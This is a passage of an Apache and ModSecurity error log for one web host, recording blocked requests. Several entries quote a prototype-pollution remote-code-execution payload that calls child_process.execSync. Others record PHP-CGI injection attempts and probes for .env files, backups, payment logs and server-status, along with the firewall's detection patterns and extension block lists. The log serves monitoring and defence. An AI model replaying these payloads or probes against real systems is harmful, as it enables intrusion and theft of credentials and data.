2026] [:error] [pid 20530:tid 20545] [client 185.177.72.60:24926] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "aai8DOCKXVGwWSyj60LiqwAAAYo"] [Thu Mar 05 01:11:08.923762 2026] [:error] [pid 20344:tid 20398] [client 185.177.72.60:25170] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "aai8DEovC1LHu1hCWINscAAAAVI"] [Thu Mar 05 01:38:37.361305 2026] [autoindex:error] [pid 20530:tid 20536] [client 91.231.89.102:34341] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 05 03:54:20.707615 2026] [:error] [pid 20107:tid 20127] [client 195.181.163.73:56535] [client 195.181.163.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: & found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/parkside-at-craig-ranch/?utm_source=vanity&utm_medium=redirect&utm_campaign=parkside-at-craig-ranch&original_referrer=craigranchapartments.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aajiTLFSUm29gCHVHYBI8gAAABA"] [Thu Mar 05 07:38:11.109927 2026] [:error] [pid 20109:tid 20159] [client 43.206.126.240:51970] [client 43.206.126.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aakWw50_-PRvUvfCZOCGrAAAAIY"] [Thu Mar 05 07:38:11.331788 2026] [:error] [pid 20109:tid 20170] [client 43.206.126.240:51970] [client 43.206.126.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aakWw50_-PRvUvfCZOCGrgAAAI0"] [Thu Mar 05 07:38:11.560508 2026] [:error] [pid 20109:tid 20150] [client 43.206.126.240:51970] [client 43.206.126.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aakWw50_-PRvUvfCZOCGrwAAAII"] [Fri Mar 06 00:57:47.135126 2026] [authz_core:error] [pid 20107:tid 20114] [client 167.71.175.236:57146] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Fri Mar 06 00:57:47.198982 2026] [authz_core:error] [pid 20323:tid 20328] [client 167.99.182.39:36546] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Fri Mar 06 00:58:02.900042 2026] [:error] [pid 20107:tid 20130] [client 167.99.182.39:38462] [client 167.99.182.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aaoKerFSUm29gCHVHYApAQAAABM"] [Fri Mar 06 00:58:02.912009 2026] [:error] [pid 20107:tid 20133] [client 167.71.175.236:40048] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aaoKerFSUm29gCHVHYApAgAAABY"] [Fri Mar 06 00:58:17.909781 2026] [:error] [pid 10125:tid 10160] [client 167.99.182.39:35958] [client 167.99.182.39] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/trace.axd"] [unique_id "aaoKiUGhTjPbMiJ2kjmsxQAAARM"] [Fri Mar 06 00:58:17.930714 2026] [:error] [pid 10125:tid 10146] [client 167.71.175.236:46116] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/trace.axd"] [unique_id "aaoKiUGhTjPbMiJ2kjmsxgAAAQU"] [Fri Mar 06 01:10:26.601795 2026] [:error] [pid 2495:tid 2604] [client 185.177.72.60:14810] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aaoNYrTYNiW57VwKcKZBEwAAApQ"] [Fri Mar 06 01:10:28.604913 2026] [:error] [pid 6456:tid 6488] [client 185.177.72.60:15500] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aaoNZKUyPRq46oml9u6cNAAAA9U"] [Fri Mar 06 01:10:29.447628 2026] [access_compat:error] [pid 2011:tid 2063] [client 185.177.72.60:15938] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Mar 06 01:10:30.579447 2026] [access_compat:error] [pid 2433:tid 2532] [client 185.177.72.60:17058] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Mar 06 01:33:59.638053 2026] [autoindex:error] [pid 11442:tid 11451] [client 91.231.89.103:47005] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 06 01:37:21.747654 2026] [autoindex:error] [pid 1274:tid 1322] [client 91.231.89.120:43029] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 06 03:48:26.252156 2026] [:error] [pid 8873:tid 8886] [client 34.211.135.232:33706] [client 34.211.135.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aaoyaq7MgneySkqp46Su5QAAAMs"] [Fri Mar 06 03:48:26.409641 2026] [:error] [pid 8873:tid 8898] [client 34.211.135.232:33706] [client 34.211.135.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aaoyaq7MgneySkqp46Su5gAAANc"] [Fri Mar 06 03:48:26.572270 2026] [:error] [pid 8873:tid 8890] [client 34.211.135.232:33706] [client 34.211.135.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aaoyaq7MgneySkqp46Su6AAAAM8"] [Fri Mar 06 19:12:35.963090 2026] [:error] [pid 15451:tid 15476] [client 35.78.63.240:35758] [client 35.78.63.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aasLAzHc-vQPL0suTUNwxgAAAVY"] [Fri Mar 06 19:12:36.186923 2026] [:error] [pid 15451:tid 15469] [client 35.78.63.240:35758] [client 35.78.63.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aasLBDHc-vQPL0suTUNwyAAAAU8"] [Fri Mar 06 19:12:36.415950 2026] [:error] [pid 15451:tid 15467] [client 35.78.63.240:35758] [client 35.78.63.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aasLBDHc-vQPL0suTUNwygAAAU0"] [Fri Mar 06 20:27:59.342479 2026] [:error] [pid 8673:tid 8739] [client 54.213.107.147:41658] [client 54.213.107.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aascr2XxhiP1i0j6zrlr5QAAAFI"] [Fri Mar 06 20:27:59.505868 2026] [:error] [pid 8673:tid 8713] [client 54.213.107.147:41658] [client 54.213.107.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: 